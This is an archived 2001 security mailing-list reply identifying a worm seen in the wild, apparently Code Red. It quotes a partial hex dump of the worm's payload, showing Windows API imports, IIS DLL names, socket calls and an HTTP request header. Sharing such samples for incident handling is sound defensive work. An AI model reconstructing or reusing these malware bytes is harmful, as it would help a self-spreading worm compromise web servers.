That is indeed a worm, though you're missing the first part of the conversation. This is the worm that Marc from eEye has been posting about; I saw a post to incidents about it arrive shortly before this one, forwarded from Aleph1.

Ryan

On Tue, 17 Jul 2001, Scott Nursten wrote:

> 0x01c0 2aa8 4c00 33c0 c3eb ece8 f1f4 ffff 4c6f *.L.3.........Lo
> 0x01d0 6164 4c69 6272 6172 7941 0047 6574 5379 adLibraryA.GetSy
> 0x01e0 7374 656d 5469 6d65 0043 7265 6174 6554 stemTime.CreateT
> 0x01f0 6872 6561 6400 4372 6561 7465 4669 6c65 hread.CreateFile
> 0x0200 4100 536c 6565 7000 4765 7453 7973 7465 A.Sleep.GetSyste
> 0x0210 6d44 6566 6175 6c74 4c61 6e67 4944 0056 mDefaultLangID.V
> 0x0220 6972 7475 616c 5072 6f74 6563 7400 0969 irtualProtect..i
> 0x0230 6e66 6f63 6f6d 6d2e 646c 6c00 5463 7053 nfocomm.dll.TcpS
> 0x0240 6f63 6b53 656e 6400 0957 5332 5f33 322e ockSend..WS2_32.
> 0x0250 646c 6c00 736f 636b 6574 0063 6f6e 6e65 dll.socket.conne
> 0x0260 6374 0073 656e 6400 7265 6376 0063 6c6f ct.send.recv.clo
> 0x0270 7365 736f 636b 6574 0009 7733 7376 632e sesocket..w3svc.
> 0x0280 646c 6c00 0047 4554 2000 3f00 2020 4854 dll..GET..?...HT
> 0x0290 5450 2f31 2e30 0d0a 436f 6e74 656e 742d TP/1.0..Content-
> 0x02a0 7479 7065 3a20 7465 7874 2f78 6d6c 0a48 type:.text/xml.H
> 0x02b0 4f53 543a 7777 772e 776f 726d 2e63 6f6d OST:www.worm.com
> 0x02c0 0a20 4163 6365 7074 3a20 2a2f 2a0a 436f ..Accept:.*/*.Co
> 0x02d0 6e74 656e 742d 6c65 6e67 7468 3a20 3335 ntent-length:.35
> 0x02e0 3639 200d 0a0d 0a00 633a 5c6e 6f74 776f 69......c:\notwo
> 0x02f0 726d 004c 4d54 480d 0a3c 6874 6d6c 3e3c rm.LMTH..<html><

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management
and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Tue Jul 17 2001 - 13:59:03 PDT